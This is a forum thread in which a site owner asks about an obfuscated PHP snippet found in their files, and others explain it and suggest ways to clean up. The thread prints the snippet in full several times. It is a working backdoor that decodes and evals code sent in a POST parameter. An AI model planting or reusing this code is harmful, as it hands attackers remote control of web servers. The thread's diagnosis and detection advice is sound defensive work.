WP Hack

Anyone know what this does? I found a guy who started to break it down, but he never said what it is actually doing. He claimed it was a WP hack.

http://somewebgeek.com/2014/wordpress-remote-code-execution-base64_decode/


But I found it on an HTML site.

<?php     $sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);

$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n571d85'];

if(isset($s22)){eval($s21($s22));}?>

PHP:

 

Make a unsecure wp site and you will eventually find lots of these little snippets once it gets hacked. Sometimes all they do is send mail like this one might. It gets a get request and sends it from your server. It can also be a sort of gateway to upload files to the server but this is just a speculation.

Sometimes you will find php shells and a bunch of other stuff, if you think your site might be infected just search for "eval(" or "base64" as these are commonly used by "hackers". Please note that some plugins and scripts may use the same functions so not all code you find is deletable.

Im not gonna link to the sites here but doing a google search for "php shell" will give you lots of results that give you the code for script like these.

 

Whats crazy is I found the hack in my root index.php which is not associated with any WP.

I still am curious what this was doing and how it got there, Been there less than a week.

 

For anyone who may have been interested, so far the

$s21 variable outputs base64_decode

and the $s22 variable outputs _POST

So it appears to me to be trying to pass _POST['n36ebd7'];

So if that helps someone to tell me a bit more.
After all that it checks that $s22 isset and then runs eval.

But what is actually happening? Where can I see the base64 that is being used?

if(isset($s22)){eval($s21($s22));}

 

its waiting for a post request with the key n36ebd7 and when it is received it will do something with that request, for example the value of that key could be an array with a message which will then be sent from your infected website, sort of like a proxy, your server gets the blame for sending the "hackers" spam.

 

So what can I do to search all of my files at one time?

I went through all my files using notepad++ and removed all lines with

<?php     $sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);

$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n571d85'];

if(isset($s22)){eval($s21($s22));}?>

PHP:

However I am not finding any with the n36ebd7

I am just now beginning to grasp using PuTTY, and godaddy does give me SSH. Is there any way to find out how they actually got into my hosting?

Is there anyway to find out more?

 

and on a new note, all files use the same

<?php     $sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n571d85'];
if(isset($s22)){eval($s21($s22));}?>

PHP:

And the part that switches is the ['n571d85'] in another file everything is the same except that part, which in example is ['n95dde0'] so how can I track this down, currently I try running the command

$ grep  "n95dde0" *.php

Code (markup):

And that is pulling nothing

 

I have used phpstorm to search all files in the past whenever this has happened to a client. Best bet is usually to restore from backup though.

A quick google search will give you these commands

find . -exec grep -i eval {} ; | grep base64; — look for long strings of numbers and letters
find . -exec grep -l eval {} ; | grep base64; — Gives names of files

Code (markup):

as I said, look for "eval(" or "base64" in all files. Note that some wp plugins may use these functions and not be "bad" so be careful when deleting stuff.